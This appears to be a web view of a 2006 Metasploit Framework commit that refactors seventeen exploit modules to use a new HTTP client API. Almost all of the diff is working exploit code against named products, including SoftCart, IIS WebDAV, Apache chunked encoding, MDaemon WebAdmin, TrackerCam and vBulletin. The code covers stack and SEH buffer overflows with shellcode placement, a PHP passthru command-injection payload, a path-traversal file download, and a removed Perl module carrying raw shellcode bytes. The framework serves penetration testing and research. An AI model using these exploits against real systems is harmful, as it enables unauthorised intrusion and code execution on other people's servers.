dnrops
/
metasploit-framework
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases Wiki Activity

Integration of the new HTTP Client API 

git-svn-id: file:///home/svn/framework3/trunk@4241 4d416f70-5f16-0410-b530-b9f4589650da
This commit is contained in:
HD Moore 2006-12-28 23:42:36 +00:00
parent e60e7bede3
commit b221af7791
17 changed files with 158 additions and 356 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

226
modules/exploits/bsdi/softcart/mercantec_softcart.rb
View File

@ -59,8 +59,7 @@ class Exploits::Bsdi::Softcart::Softcart01 < Msf::Exploit::Remote
end
def brute_exploit(address)
print_status("Trying #{"%.8x" % address['Ret']}...")
buffer =
"MAA+scstoreB" +
rand_text_alphanumeric(512) +
@ -69,227 +68,14 @@ class Exploits::Bsdi::Softcart::Softcart01 < Msf::Exploit::Remote
[address['Ret'] + payload.encoded.length].pack('V') +
payload.encoded
connect('global' => true)
req = client.request(
'uri' => datastore['URI'] + "?" + buffer)
client.send_request(req)
print_status("Trying #{"%.8x" % address['Ret']}...")
res = send_request_raw({
'uri' => datastore['URI'],
'query' => buffer
}, 5)
handler
disconnect
end
=begin
##
# This file is part of the Metasploit Framework and may be redistributed
# according to the licenses defined in the Authors field below. In the
# case of an unknown or missing license, this file defaults to the same
# license as the core Framework (dual GPLv2 and Artistic). The latest
# version of the Framework can always be obtained from metasploit.com.
##
package Msf::Exploit::mercantec_softcart;
use strict;
use base "Msf::Exploit";
my $advanced =
{
'StackBottom' => [ '', 'Start address for stack ret.' ],
'StackTop' => [ '', 'Stop address for stack ret.' ],
'StackStep' => [ 0, 'Number of bytes to increment between steps.' ],
'BruteWait' => [ 0, 'Number of seconds to wait between steps.' ],
};
my $info =
{
'Name' => 'Mercantec SoftCart CGI Overflow',
'Version' => '$Revision: 3110 $',
'Authors' =>
[
'skape <mmiller [at] hick.org>',
'trew <trew [at] exploit.us>'
],
'Description' =>
qq{
This is an exploit for an undisclosed buffer overflow
in the SoftCart.exe CGI as shipped with Mercantec's shopping
cart software. It is possible to execute arbitrary code by
passing a malformed CGI parameter in an HTTP GET request.
This issue is known to affect SoftCart version 4.00b.
},
'Arch' => [ 'x86' ],
'OS' => [ 'bsdi' ],
'Priv' => 0,
'UserOpts' =>
{
'RHOST' => [ 1, 'ADDR', 'The target HTTP server address' ],
'RPORT' => [ 1, 'PORT', 'The target HTTP server port', 80 ],
'VHOST' => [ 1, 'DATA', 'The target HTTP virtual host', 'auto' ],
'URI' => [ 1, 'DATA', 'The target CGI URI', '/cgi-bin/SoftCart.exe' ],
},
'Payload' =>
{
'Space' => 1000, # tons
'MinNops' => 16,
'BadChars'=> "\x09\x0a\x0b\x0c\x0d\x20\x27\x5c\x3c\x3e" .
"\x3b\x22\x60\x7e\x24\x5e\x2a\x26\x7c\x7b" .
"\x7d\x28\x29\x3f\x5d\x5b\x00",
'PrependEncoder' => "\x83\xec\x7f", # sub $0x7f, %esp
},
'Refs' =>
[
['OSVDB', '9011'],
['MIL', '38'],
],
'DefaultTarget' => -1,
'Targets' =>
[
# Name Bottom/Ret Top
[ 'BSDi/4.3 Bruteforce', 0xefbf3000, 0xefbffffc ],
[ 'BSDi/4.3', 0xefbf4b8e, 0x0 ],
],
'Keys' => ['softcart'],
'DisclosureDate' => 'Aug 19 2004',
};
sub new
{
my $class = shift;
my $self;
$self = $class->SUPER::new(
{
'Info' => $info,
'Advanced' => $advanced,
},
@_);
return $self;
}
#
# We must fork our child before doing fun stuff.
#
sub PayloadPrepend
{
my $self = shift;
return "\x6a\x02\x58\x50\x9a\x00\x00\x00\x00\x07\x00" .
"\x85\xd2\x75\x0a\x31\xc0\x40\x9a\x00\x00\x00" .
"\x00\x07\x00";
}
sub Exploit
{
my $self = shift;
my $targetIdx = $self->GetVar('TARGET');
my $payload = $self->GetVar('EncodedPayload');
my $shellcode = $payload->Payload;
my $target = $self->Targets->[$targetIdx];
my $ret = $target->[1];
my $valid;
$self->PrintLine('[*] Trying exploit target ' . $target->[0]);
if ($target->[0] =~ /Bruteforce/)
{
my $stackTop = hex($self->GetLocal('StackTop'));
my $stackBottom = hex($self->GetLocal('StackBottom'));
my $stackStep = $self->GetLocal('StackStep');
my $wait = $self->GetLocal('BruteWait');
$stackBottom = $target->[1] if ($stackBottom == 0);
$stackTop = $target->[2] if ($stackTop == 0);
$stackStep = $payload->NopsLength if ($stackStep == 0);
$self->PrintLine(sprintf('[*] Brute forcing %.8x => %.8x (step %d)...',
$stackBottom, $stackTop, $stackStep));
# Loop through addresses, incrementing by stackStep each interval
for ($ret = $stackBottom, $valid = $ret + length($shellcode);
$ret < $stackTop;
$ret = $self->StepAddress(Address => $ret, StepSize => $stackStep, Direction => 1),
$valid = $self->StepAddress(Address => $valid, StepSize => $stackStep, Direction => 1))
{
# Wrap valid around if it goes past the top
$valid = $stackBottom if ($valid >= $stackTop);
$self->PrintLine(sprintf("[*] Trying %.8x...", $ret));
last if (not defined($self->transmitExploit(target => $target,
shellcode => $shellcode, ret => $ret, valid => $valid)));
sleep($wait);
}
}
else
{
$valid = $ret + length($shellcode);
$self->transmitExploit(target => $target,
shellcode => $shellcode, ret => $ret, valid => $valid);
}
}
sub transmitExploit
{
my $self = shift;
my ($target, $shellcode, $ret, $valid) = @{{@_}}{qw/target shellcode ret valid/};
my $targetHost = $self->GetVar('RHOST');
my $targetPort = $self->GetVar('RPORT');
my $vhost = $self->GetVar('VHOST');
my $uri = $self->GetVar('URI');
my $bof;
my $s;
$vhost = $targetHost if (not defined($vhost) or $vhost eq 'auto');
# Build payload
$bof = "MAA+scstoreB";
$bof .= "A" x (524 - length($bof));
$bof .= pack("V", $ret);
$bof .= "MSF!";
$bof .= pack("V", $valid);
$bof .= $shellcode;
my $s = Msf::Socket::Tcp->new
(
'PeerAddr' => $targetHost,
'PeerPort' => $targetPort,
'LocalPort' => $self->GetVar('CPORT'),
'SSL' => $self->GetVar('SSL'),
);
if ($s->IsError) {
$self->PrintError;
return;
}
# << pow! >>
$s->Send("GET $uri?$bof HTTP/1.0\r\n" .
"Host: $vhost\r\n" .
"\r\n");
return 1;
}
1;
=end
end
end

16
modules/exploits/multi/realserver/describe.rb
View File

@ -46,10 +46,12 @@ class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
end
def check
response = request(
res = send_request_raw({
'method' => 'OPTIONS',
'proto' => 'RTSP/1.0',
'uri' => '/')
'proto' => 'RTSP',
'version' => '1.0',
'uri' => '/'
}, 5)
if response and response['Server']
print_status("Found RTSP: #{response['Server']}")
@ -65,10 +67,12 @@ class Exploits::Multi::Realserver::Describe < Msf::Exploit::Remote
encoded = payload.encoded.gsub(/./) { |char| "%%%.2x" % char[0] }
request(
res = send_request_raw({
'method' => 'DESCRIBE',
'proto' => 'RTSP/1.0',
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi")
'proto' => 'RTSP',
'version' => '1.0',
'uri' => "/" + ("../" * 560) + "\xcc\xcc\x90\x90" + encoded + ".smi"
}, 5)
handler
end

20
modules/exploits/unix/http/php_vbulletin_template.rb
View File

@ -16,7 +16,7 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
is enabled. All versions of vBulletin prior to 3.0.7 are
affected.
},
'Author' => [ 'str0ke <str0ke@milw0rm.com>', 'cazz' ],
'Author' => [ 'str0ke <str0ke[at]milw0rm.com>', 'cazz' ],
'License' => BSD_LICENSE,
'Version' => '$Revision$',
'References' => [
@ -46,22 +46,24 @@ class Exploits::Unix::Http::PhpvBulletinTemplateName < Msf::Exploit::Remote
deregister_options(
'HTTP::junk_slashes' # For some reason junk_slashes doesn't always work, so turn that off for now.
)
)
end
def go(command)
wrapper = Rex::Text.rand_text_alphanumeric(rand(128)+32)
command = "echo #{wrapper};#{command};echo #{wrapper};"
encoded = command.unpack("C*").collect{|x| "chr(#{x})"}.join('.')
uri = datastore['PATH'] + "?do=page&template={${passthru(#{encoded})}}";
res = request({
'uri' => datastore['PATH'],
'method' => 'GET',
})
res = send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'GET',
'vars_get' =>
{
'do' => "page",
'template' => "{${passthru(#{encoded})}}"
}
}, 5)
if (res and res.body)
b = /#{wrapper}[\s\r\n]*(.*)[\s\r\n]*#{wrapper}/sm.match(res.body)

6
modules/exploits/unix/http/php_xmlrpc_eval.rb
View File

@ -67,12 +67,12 @@ class Exploits::Unix::Http::PhpXmlrpcEval < Msf::Exploit::Remote
"</param></params>" +
"</methodCall>";
res = request({
res = send_request_cgi({
'uri' => datastore['PATH'],
'method' => 'POST',
'Content-Type' => 'application/xml',
'ctype' => 'application/xml',
'data' => xml,
})
}, 5)
if (res and res.body)

31
modules/exploits/windows/http/altn_webadmin.rb
View File

@ -50,11 +50,9 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
# Identify the target based on the WebAdmin version number
def autofilter
c = connect
req = c.request({ 'uri' => '/WebAdmin.DLL' })
res = c.send_request(req, -1)
disconnect
res = send_request_raw({
'uri' => '/WebAdmin.DLL'
}, -1)
if (res and res.body =~ /WebAdmin.*v(2\..*)$/)
case $1
@ -78,29 +76,28 @@ class Exploits::Windows::Http::ALTN_WebAdmin_Overflow < Msf::Exploit::Remote
end
def exploit
c = connect
user_cook = Rex::Text.rand_text_alphanumeric(2)
post_data = 'User=' + make_nops(168) + [target.ret].pack('V') + payload.encoded
post_data << '&Password=wtf&languageselect=en&Theme=Heavy&Logon=Sign+In'
req = c.request({
'uri' => '/WebAdmin.DLL?View=Logon',
print_status("Sending request...")
res = send_request_cgi({
'uri' => '/WebAdmin.DLL',
'query' => 'View=Logon',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'cookie' => "User=#{user_cook}; Lang=en; Theme=standard",
'data' => post_data,
})
'headers' =>
{
'Accept' => 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png',
'Accept-Language' => 'en',
'Accept-Charset' => 'iso-8859-1,*,utf-8'
}
}, 5)
req.headers['Accept'] = 'image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png'
req.headers['Accept-Language'] = 'en'
req.headers['Accept-Charset'] = 'iso-8859-1,*,utf-8'
print_status("Sending request...")
res = c.send_request(req)
handler
disconnect
end
end

6
modules/exploits/windows/http/apache_chunked.rb
View File

@ -230,16 +230,14 @@ class Exploits::Windows::Http::ApacheChunkedEncoding < Msf::Exploit::Remote
print_status("Trying #{target.name} [ #{"0x%.8x" % target.ret}/#{pad} ]")
# Build the request
request(
send_request_raw({
'uri' => '/',
'headers' =>
{
'Host' => "#{vhost}:#{rport}",
'Transfer-Encoding' => "CHUNKED"
},
'data' => "FFFFFFF0 " + pattern,
'timeout' => 2
)
}, 2)
# Check the handler
handler

5
modules/exploits/windows/http/ia_webmail.rb
View File

@ -52,12 +52,13 @@ class Exploits::Windows::Http::IaWebmail < Msf::Exploit::Remote
def exploit
print_status("Sending request...")
request(
send_request_raw({
'uri' =>
"/" + ("o" * target['Length']) +
"META" +
[target.ret].pack('V') +
payload.encoded)
payload.encoded
}, 2)
handler
end

18
modules/exploits/windows/http/ipswitch_wug_maincfgret.rb
View File

@ -52,27 +52,27 @@ class Exploits::Windows::Http::Ipswitch_Wug_Maincfgret < Msf::Exploit::Remote
def exploit
c = connect
num = rand(65535).to_s
num = rand(65535).to_s
user_pass = "#{datastore['HTTPUSER']}" + ":" + "#{datastore['HTTPPASS']}"
req = "Authorization: Basic #{Rex::Text.encode_base64(user_pass)}\r\n\r\n"
req << "page=notify&origname=&action=return&type=Beeper&instancename="
req << Rex::Text.rand_text_alpha_upper(811, payload_badchars) + "\xeb\x06"
req << make_nops(2) + [target.ret].pack('V') + make_nops(10) + payload.encoded
req << "&beepernumber=&upcode=" + num + "*&downcode="+ num + "*&trapcode=" + num + "*&end=end"
req = c.request({
print_status("Trying target %s..." % target.name)
res = send_request_cgi({
'uri' => '/_maincfgret.cgi',
'method' => 'POST',
'content-type' => 'application/x-www-form-urlencoded',
'data' => req,
})
'headers' =>
{
'Authorization' => "Basic #{Rex::Text.encode_base64(user_pass)}"
}
}, 5)
print_status("Trying target %s..." % target.name)
res = c.send_request(req)
handler
disconnect
end
end

8
modules/exploits/windows/http/maxdb_webdbm_get_overflow.rb
View File

@ -59,8 +59,6 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
end
def exploit
c = connect
# Trigger the SEH by writing past the end of the page after
# the SEH is already overwritten. This avoids the other smashed
# pointer exceptions and goes straight to the payload.
@ -71,10 +69,12 @@ class Exploits::Windows::Http::MaxDB_WebDBM_GET_Overflow < Msf::Exploit::Remote
buf[3647, 4] = [target.ret].pack('V')
print_status("Trying target address 0x%.8x..." % target.ret)
res = c.send_request(c.request({ 'uri' => '/%' + buf }), -1)
send_request_raw({
'uri' => '/%' + buf
}, 5)
handler
disconnect
end
end

7
modules/exploits/windows/http/minishare_get_overflow.rb
View File

@ -55,17 +55,16 @@ class Exploits::Windows::Http::Minishare_GET_Overflow < Msf::Exploit::Remote
end
def exploit
c = connect
uri = Rex::Text.rand_text_alphanumeric(target['Rets'][0])
uri << [target['Rets'][1]].pack('V')
uri << payload.encoded
print_status("Trying target address 0x%.8x..." % target['Rets'][1])
res = c.send_request(c.request({ 'uri' => uri }), -1)
send_request_raw({
'uri' => uri
}, 5)
handler
disconnect
end
end

9
modules/exploits/windows/http/shoutcast_format.rb
View File

@ -57,7 +57,10 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
end
def check
r = request('uri' => '/')
r = send_request_raw({
'uri' => uri
}, 5)
return Exploit::CheckCode::Safe if not r
m = r.body.match(/Network Audio Server\/([^\s]+)\s+([^<]+)<BR/)
@ -86,7 +89,9 @@ class Exploits::Windows::Http::Shoutcast_Format < Msf::Exploit::Remote
uri << '#0100x.mp3'
print_status("Trying to exploit target #{target.name} 0x%.8x" % target.ret)
res = request({ 'uri' => uri })
send_request_raw({
'uri' => uri
}, 5)
handler
disconnect

26
modules/exploits/windows/http/trackercam_phparg_overflow.rb
View File

@ -67,9 +67,10 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
end
def check
c = connect
req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=../HTTPRoot/socket.php3' })
res = c.send_request(req, -1)
res = send_request_raw({
'uri' => '/tuner/ComGetLogFile.php3',
'query' => 'fn=../HTTPRoot/socket.php3'
}, 5)
if (res and res.body =~ /fsockopen/)
fp = fingerprint()
@ -86,19 +87,22 @@ class Exploits::Windows::Http::TrackerCam_PHPArg_Overflow < Msf::Exploit::Remote
seh = generate_seh_payload(target.ret)
buf[257, seh.length] = seh
uri = "/tuner/TunerGuide.php3?userID=#{buf}"
print_status("Sending request...")
res = c.send_request(c.request({ 'uri' => uri }), -1)
res = send_request_raw({
'uri' => '/tuner/TunerGuide.php3',
'query' => 'userID=' + buf
}, 5)
handler
disconnect
end
def download(path)
c = connect
req = c.request({ 'uri' => '/tuner/ComGetLogFile.php3?fn=' + ("../" * 10) + path })
res = c.send_request(req, -1)
res = send_request_raw({
'uri' => '/tuner/ComGetLogFile.php3',
'query' => 'fn=' + ("../" * 10) + path
}, 5)
return if not (res and res.body and res.body =~ /tuner\.css/ and res.body =~ /<pre>/)
m = res.match(/<pre>(.*)<\/pre><\/body>/smi)

23
modules/exploits/windows/iis/ms03_007_ntdll_webdav.rb
View File

@ -75,7 +75,13 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
"<?xml version=\"1.0\"?>\r\n<g:searchrequest xmlns:g=\"DAV:\">\r\n" +
"<g:sql>\r\nSelect \"DAV:displayname\" from scope()\r\n</g:sql>\r\n</g:searchrequest>\r\n"
response = request({ 'uri' => "/#{url}", 'content-type' => 'text/xml', 'method' => 'SEARCH', 'data' => xml}, 5)
response = send_request_cgi({
'uri' => '/' + uri,
'ctype' => 'text/xml',
'method' => 'SEARCH',
'data' => xml
}, 5)
if (response and response.body =~ /Server Error\(exception/)
return Exploit::CheckCode::Vulnerable
@ -83,7 +89,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
# Did the server stop acceping requests?
begin
request({ 'uri' => '/'} )
send_request_raw({'uri' => '/'}, 5)
rescue
return Exploit::CheckCode::Vulnerable
end
@ -93,7 +99,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
def exploit
# verify the service is running up front
request({'uri' => '/'})
send_request_raw({'uri' => '/'}, 5)
if datastore['HTTP::junk_pipeline'] > 0
print_status('junk pipelined exploitation requests may not work. If exploitation fails, try disabling pipelining')
@ -139,10 +145,15 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
url[ 283, 2 ] = ret
begin
request({ 'uri' => "/#{url}", 'content-type' => 'text/xml', 'method' => 'SEARCH', 'data' => xml}, nil)
send_request_cgi({
'uri' => url,
'ctype' => 'text/xml',
'method' => 'SEARCH',
'data' => xml
}, 5)
handler
rescue => e
print_error("attempt failed: #{e.to_s}")
print_error("Attempt failed: #{e.to_s}")
end
1.upto(8) { |i|
@ -163,7 +174,7 @@ class Exploits::Windows::Iis::MS03_007_WEBDAV_NTDLL < Msf::Exploit::Remote
print_status('Checking if IIS is back up after a failed attempt...')
1.upto(20) {|i|
begin
request({'uri' => '/'})
send_request_raw({'uri' => '/'}, 5)
rescue
print_status("Connection failed (#{i} of 20)...")
sleep(2)

38
modules/exploits/windows/isapi/fp30reg_chunked.rb
View File

@ -70,23 +70,23 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
if (i % 3 == 0)
print_status("Refreshing the remote DLLHost.exe process...")
c.send_request(c.request({ 'uri' => datastore['URL'] }), -1)
send_request_raw({
'uri' => datastore['URL']
}, -1)
end
print_status("Trying to exploit fp30reg.dll (request #{i.to_s} of 15)")
send_request_raw({
'uri' => datastore['URL'],
'method' => 'POST',
'headers' =>
{
'Transfer-Encoding' => 'Chunked'
},
'data' => "DEAD\r\n#{pat}\r\n0\r\n"
}, 5)
c.connect
s = c.conn
print_status("Trying to exploit fp30reg.dll (#{i.to_s} of 15)")
req =
"POST #{datastore['URL']} HTTP/1.1\r\n" +
"Host: #{datastore['VHOST'] || datastore['RHOST']}\r\n" +
"Transfer-Encoding: Chunked\r\n\r\n" +
"DEAD\r\n" +
pat + "\r\n" +
"0\r\n"
s.put(req)
sock.put(req)
sleep(1)
handler
@ -95,10 +95,10 @@ class Exploits::Windows::Isapi::IIS_FP30REG_Chunked < Msf::Exploit::Remote
end
def check
c = connect
print_status("Refreshing the remote DLLHost.exe process...")
r = c.send_request(c.request({ 'uri' => datastore['URL'] }), -1)
disconnect
print_status("Requesting the vulnerable ISAPI path...")
r = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (r and r.code == 501)
return Exploit::CheckCode::Detected

22
modules/exploits/windows/isapi/nsiislog_post.rb
View File

@ -58,9 +58,9 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
end
def check
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
r = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (res and res.body =~ /NetShow ISAPI/)
return Exploit::CheckCode::Detected
@ -70,9 +70,7 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
def exploit_target(target)
c = connect
buf = ''
vars = {}
%w{
date time c-dns cs-uri-stem c-starttime
x-duration c-rate c-status c-playerid c-playerversion
@ -86,17 +84,15 @@ class Exploits::Windows::Isapi::IIS_NSIISLOG_Overflow < Msf::Exploit::Remote
pat[ target['Rets'][0] - 4, seh.length] = seh
buf << pat
req = c.request({
print_status("Sending request...")
res = send_request_cgi({
'uri' => datastore['URL'],
'method' => 'POST',
'user-agent' => 'NSPlayer/2.0',
'content-type' => 'application/x-www-form-urlencoded',
'data' => buf,
})
print_status("Sending request...")
c.send_request(req, 0)
'data' => buf
}, 5)
handler
disconnect
end

21
modules/exploits/windows/isapi/rsa_webagent_redirect.rb
View File

@ -62,8 +62,11 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
end
def check
c = connect
r = c.send_request(c.request({ 'uri' => datastore['URL'] + '?GetPic?image=msf' }))
r = send_request_raw({
'uri' => datastore['URL'],
'query' => 'GetPic?image=msf'
}, -1)
if (r and r.body and r.body =~ /RSA Web Access Authentication/)
return Exploit::CheckCode::Detected
end
@ -71,14 +74,16 @@ class Exploits::Windows::Isapi::RSA_WebAgent_Redirect < Msf::Exploit::Remote
end
def exploit
c = connect
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A')
pat = Rex::Text.rand_text_alphanumeric(8192).gsub(/\d|Z/i, 'A') # HACK
seh = generate_seh_payload(target['Rets'][1])
pat[target['Rets'][0]-4, seh.length] = seh
c.send_request(c.request({ 'uri' => datastore['URL'] + '?Redirect?url=' + pat }))
r = send_request_raw({
'uri' => datastore['URL'],
'query' => 'Redirect?url=' + pat
}, 5)
handler
disconnect
end

32
modules/exploits/windows/isapi/w3who_query.rb
View File

@ -59,11 +59,9 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
# Identify the target based on the IIS version
def autofilter
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
disconnect
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
# Was a vulnerable system detected?
if (res and res.body =~ /Access Token/)
@ -82,36 +80,32 @@ class Exploits::Windows::Isapi::IIS_W3WHO_Overflow < Msf::Exploit::Remote
end
def check
c = connect
req = c.request({ 'uri' => datastore['URL'] })
res = c.send_request(req, -1)
require 'pp'
pp res
res = send_request_raw({
'uri' => datastore['URL']
}, -1)
if (res and res.body =~ /Access Token/)
return Exploit::CheckCode::Vulnerable
end
return Exploit::CheckCode::Safe
end
def exploit
c = connect
buf = Rex::Text.rand_text_english(8192, payload_badchars)
buf[target['Rets'][0] - 4, 4] = make_nops(2) + "\xeb\x04"
buf[target['Rets'][0] - 0, 4] = [ target['Rets'][1] ].pack('V')
buf[target['Rets'][0] + 4, 4] = "\xe9" + [-641].pack('V')
buf[target['Rets'][0] - 4 - payload.encoded.length, payload.encoded.length] = payload.encoded
url = datastore['URL'] + '?' + buf
req = c.request({ 'uri' => url })
print_status("Sending request...")
c.send_request(req, 0)
r = send_request_raw({
'uri' => datastore['URL'],
'query' => buf
}, 5)
handler
disconnect
end
end